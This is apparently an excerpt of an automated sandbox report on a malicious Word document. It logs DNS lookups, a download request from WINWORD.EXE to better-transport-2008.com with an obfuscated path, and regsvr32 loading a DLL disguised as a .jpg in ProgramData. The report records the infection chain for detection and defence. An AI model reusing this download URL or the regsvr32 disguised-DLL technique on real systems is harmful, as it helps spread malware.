Apr 28, 2021 17:54:37.235939026 CEST | 53 | 54791 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:54:37.803473949 CEST | 50463 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:54:37.863825083 CEST | 53 | 50463 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:54:38.089435101 CEST | 50394 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:54:38.146418095 CEST | 53 | 50394 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:54:38.461846113 CEST | 58530 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:54:38.519911051 CEST | 53 | 58530 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:54:39.147217989 CEST | 53813 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:54:39.196208954 CEST | 53 | 53813 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:54:39.769923925 CEST | 63732 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:54:39.818856955 CEST | 53 | 63732 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:54:40.271285057 CEST | 57344 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:54:40.331155062 CEST | 53 | 57344 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:54:41.071149111 CEST | 54450 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:54:41.128385067 CEST | 53 | 54450 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:54:42.502276897 CEST | 59261 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:54:42.562767982 CEST | 53 | 59261 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:54:42.980550051 CEST | 57151 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:54:43.029457092 CEST | 53 | 57151 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:54:44.660398960 CEST | 59413 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:54:44.721771002 CEST | 53 | 59413 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:55:21.990047932 CEST | 60516 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:55:22.038893938 CEST | 53 | 60516 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:55:23.760679960 CEST | 51649 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:55:23.827646017 CEST | 53 | 51649 | 8.8.8.8 | 192.168.2.5

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Apr 28, 2021 17:53:44.715724945 CEST | 192.168.2.5 | 8.8.8.8 | 0xc3d3 | Standard query (0) | better-transport-2008.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Apr 28, 2021 17:53:44.775250912 CEST | 8.8.8.8 | 192.168.2.5 | 0xc3d3 | No error (0) | better-transport-2008.com | | 45.142.215.160 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• better-transport-2008.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49710 | 45.142.215.160 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 17:53:44.855736017 CEST | 1436 | OUT | GET /bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTs HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: better-transport-2008.com
Connection: Keep-Alive
Apr 28, 2021 17:53:45.297656059 CEST | 1440 | IN | HTTP/1.1 200 OK
Date: Wed, 28 Apr 2021 15:53:44 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
X-Powered-By: PHP/7.2.34
Content-Length: 204
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 6c 61 6b 61 34 22 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data ASCII: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL "laka4" was not found on this server.</p></body></html>


Code Manipulations

Statistics

Behavior


System Behavior

General

Start time: 17:53:38
Start date: 28/04/2021
Path: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
Imagebase: 0x1000000
File size: 1937688 bytes
MD5 hash: 0B9AB9B9C4DE429473D6450D4297A123
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 17:53:43
Start date: 28/04/2021
Path: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
Imagebase: 0x1000000
File size: 1937688 bytes
MD5 hash: 0B9AB9B9C4DE429473D6450D4297A123
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                                                                  General

                                                                                                                                                  Start time:17:53:45
                                                                                                                                                  Start date:28/04/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:regsvr32 c:\programdata\argumentSelectTmp.jpg
                                                                                                                                                  Imagebase:0x9d0000
                                                                                                                                                  File size:20992 bytes
                                                                                                                                                  MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Disassembly

                                                                                                                                                  Code Analysis
